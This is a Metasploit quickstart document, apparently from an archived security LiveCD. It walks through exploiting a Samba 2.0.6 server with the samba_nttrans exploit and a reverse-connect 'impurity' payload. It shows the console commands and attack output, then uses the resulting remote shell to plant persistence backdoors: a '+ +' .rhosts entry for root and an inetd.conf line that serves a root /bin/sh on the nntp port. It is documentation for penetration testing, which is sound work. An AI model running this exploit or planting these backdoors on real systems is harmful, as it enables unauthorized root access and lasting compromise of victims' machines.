home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / docs / QUICKSTART.impurity < prev    next >
Text File  |  2006-06-30  |  5KB  |  121 lines

  1. 1) Determine your metasploit interface and options
  2.  
  3. + -- --=[ msfconsole v2.3 [46 exploits - 68 payloads]
  4.  
  5. msf > setg RHOST 192.168.0.252
  6. RHOST -> 192.168.0.252
  7. msf > setg LHOST 192.168.0.20
  8. LHOST -> 192.168.0.20
  9. msf > use samba_nttrans
  10. msf samba_nttrans > set TARGET 3
  11. TARGET -> 3
  12.  
  13.  
  14. 2) Set PAYLOAD to linux_ia32_reverse_impurity
  15.  
  16. msf samba_nttrans > set PAYLOAD linux_ia32_reverse_impurity
  17. PAYLOAD -> linux_ia32_reverse_impurity
  18.  
  19.  
  20. 3) Set PEXEC to the path of your impurity module
  21.  
  22. msf samba_nttrans(linux_ia32_reverse_impurity) > set PEXEC data/shelldemo
  23. PEXEC -> data/shelldemo
  24.  
  25.  
  26. 4) Launch the exploit
  27.  
  28. msf samba_nttrans(linux_ia32_reverse_impurity) > exploit
  29. [*] Starting Reverse Handler.
  30. [*] Starting attack against target Samba 2.0.6 / Red Hat 6.2
  31. [*] Attack will use 1 threads with 1 total attempts
  32.  
  33. [*] Establishing 1 connection(s) to the target...
  34. [*] --- Setting up the SMB session...
  35. [*] --- Establishing tree connection...
  36. [*] --- Sending first nttrans component...
  37. [*] --- Completed range 0x081389c0:0x08138380
  38. [*] Got connection from 192.168.0.21:4321 <-> 192.168.0.252:1042
  39. [*] Sleeping before sending impurity data.
  40. [*] Uploading impurity data (31628), Please wait...
  41. [*] Executing impurity data.
  42.  
  43. --=[ Impurity Demo Shell ]=--
  44. impurity demo > 
  45.  
  46.  
  47. 5) Use the Impurity shell!
  48.  
  49. impurity demo > help
  50. Available commands:
  51.     help                            Show this help screen
  52.     fork                            Fork off another shelldemo process
  53.     exec <cmd>                      Execute <cmd>
  54.     system <cmd>                    Fork and execute <cmd> on std(in/out/err)
  55.     quit                            Exit the shell
  56.  
  57.     open <path>                     Open a file and return the file descriptor
  58.     lseek <fd> <offset> <whence>    Reposition <fd>
  59.     read <fd> [bytes]               Read <bytes> from file descriptor
  60.     write <fd> [bytes]              Write [bytes] (or until "EOF") to <fd>
  61.     close <fd>                      Close specified file descriptor
  62.     dup <old_fd>                    Duplicate <old_fd> and return new reference
  63.     dup2 <old_fd> <new_fd>          Duplicate <old_fd> to <new_fd>
  64.  
  65.     ls [path]                       Print information/contents about [path] (default: .)
  66.     getcwd                          Get current working directory
  67.     chmod <permission> <path>       Change <path> permissions to <permission>
  68.     chown <user> <path>             Change <path> owner to <user>
  69.     chgrp <group> <path>            Change <path> group to <group>
  70.     chdir <path>                    Change working directory to <path>
  71.     mkdir <path> [permission]       Create <path> directory with [permission] (default: 755)
  72.     rmdir <path>                    Remove <path> directory
  73.     rename <old_file> <new_file>    Rename <old_file> to <new_file>
  74.     unlink <path>                   Remove <path> file
  75.     chroot <path>                   Change root directory to <path>
  76.     link <file> <reference>         Hard link <reference> to <file>
  77.     symlink <file> <reference>      Symbolically link <reference> to <file>
  78.  
  79.     getid                           Print information about [e][ug]id
  80.     setuid <uid>                    Set UID to <uid>
  81.     setgid <gid>                    Set GID to <gid>
  82.  
  83.     kill <pid> [signal]             Send <pid> [signal] (default: 9)
  84.     getpid                          Print current process ID
  85.     getppid                         Print parent process ID
  86.  
  87.     time                            Display the current system time
  88.     uname                           Get kernel information
  89.     hostname [name]                 Print (or set) the hostname
  90.     reboot                          Reboot the computer
  91.     shutdown                        Shutdown the computer
  92.     halt                            Halt the computer
  93.  
  94.     lsfd                            Show information about open file descriptors
  95.  
  96. Warning! Before using any of the following you are recommended to fork for your own safety!
  97.     fchdir_breakchroot <temp_dir>   Use <temp_dir> to attempt to break out of chroot
  98. impurity demo > getid
  99. uid=0(root) gid=0(root) euid=99(nobody) egid=99(nobody)
  100. impurity demo > setuid 0
  101. impurity demo > setgid 0
  102. impurity demo > chdir /root/
  103. impurity demo > open .rhosts
  104. open: 10
  105. impurity demo > write 10
  106. + +
  107. EOF
  108. impurity demo > close 10
  109. impurity demo > chdir /etc
  110. impurity demo > open inetd.conf
  111. open: 10
  112. impurity demo > write 10
  113. nntp stream tcp nowait root /bin/sh sh -i
  114. EOF
  115. impurity demo > close 10
  116. impurity demo > system ps aux | grep inetd
  117. root       485  0.0  0.2  1168  464 ?        S    Mar22   0:00 inetd
  118. root     10276  0.0  0.2  1208  424 ?        S    11:11   0:00 grep inetd
  119. impurity demo > kill 485 1
  120. impurity demo > exit
  121.